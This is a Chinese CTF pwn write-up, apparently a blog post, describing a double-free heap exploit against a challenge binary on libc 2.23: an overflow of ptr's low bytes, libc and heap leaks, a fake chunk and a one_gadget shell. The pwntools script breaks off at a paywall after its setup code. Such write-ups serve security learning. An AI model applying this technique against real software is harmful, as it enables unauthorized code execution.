文章详细介绍了如何利用程序中的read函数读取数据时的漏洞,结合doublefree技术来攻击系统。首先,通过读取操作覆盖ptr的低4字节,然后利用unsortedbin中的chunk特性泄露libc地址。接着,通过fastbin泄露heap地址,构造doublefree并植入fakechunk,最终触发onegadget利用系统提权。
分析
先讲一下漏洞点
这里有个很迷惑的地方就是 read(0, v6, 0x18uLL);,一开始始终没有找到漏洞出现的地方,结果问里一下其他师傅,恍然大悟,我就是傻子。
这里可以向v6中读入0x18个字节的大小。刚好可以覆盖ptr处的低4字节。可以利用这个特点构造double free来进行攻击。
利用
这里只是简单讲一下,一定要动手调试!!!调试!!!调试!!!
先把前面的代码写好
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",32809)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size,data):
ru(b"choice:")
sl(b"1")
ru(b"si
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
